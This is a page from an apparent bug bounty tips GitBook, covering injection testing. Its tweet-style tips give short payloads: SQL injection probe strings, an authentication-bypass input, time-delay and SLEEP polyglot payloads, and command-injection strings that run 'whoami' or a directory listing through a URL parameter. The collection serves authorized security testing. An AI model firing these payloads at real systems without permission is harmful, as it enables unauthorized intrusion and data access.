Book of BugBounty Tips
  • Introduction
  • OSINT / Recon
  • API
  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Sensitive Information Disclosure
  • Cross Site Scripting (XSS)
  • CRLF
  • Remote Code Execution (RCE)
  • Email Bypass
  • File Upload
  • Open Redirect
  • Insecure Direct Object Reference (IDOR)
  • Injection
  • XXE
  • Local / Remote File Inclusion
  • Authentication / Authorization
  • Account Takeover
  • Application Login
  • Clickjacking
  • Parameter Pollution
  • Fuzzing
  • Application Logic Bypasses
  • Bypasses
  • Mobile
  • Password Reset
  • Web Cache
  • Server Side Template Injection
  • Tips from @EdOverflow
  • Tips From @intigriti
  • Hackpack From @yeswehack
  • Tips from @YogoshaOfficial
  • Tips from @Jhaddix
  • Tips from Ben (@nahamsec)
  • Tips from Other Sources
  • Tips from Blog posts / other hunters
  • Others
  • Bugbounty Related Websites / Blogs
  • Docker and k8s
  • Tweets Collection by @Pentesterland
  • Windows
  • Linux
  • Burp suite
  • Scope Based Recon Tips
Powered by GitBook
On this page

Injection

  • #BugBountyTip did you know that the character '_' acts like the regex character '.' in SQL queries https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php …

  • #bugbountytip It's possible to fire up "#OS #Command #Injection" instead of #XSS in Filename.PDF?parameter=PAYLOAD+|+Dir+c:\

  • #bugbountytips When you're trying to trigger a Command Injection flaw in #Python Web Application try to surround your payload with str() funciton i.e "%2bstr(__import.('os').system('whoami'))%2b"

  • Use Burp Intruder for Expression Language Injection and grep the response for 7744 :)

  • I found two SQL Injections tonight in private programs. One blind and the other hanging in plain sight. Here’s a tip. Wayback -> http://company.com -> grep | .php?id=

  • Give this a try while testing for SQLi Authentication Bypass :

    username: '--' / "--" password: '--' / "--"

  • Basic payload to test SQLi in Burp Repeater: '; waitfor delay '0:0:3' -- Check the time in the Response side if it delays the same as you change the seconds in the payload.ImageImage

  • This is how I found sql-Injection 100% of the time For http://site.com/?q=HERE /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips

  • SQLi Polyglot SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ by@avlidienbrunn

PreviousInsecure Direct Object Reference (IDOR)NextXXE

Last updated 2 months ago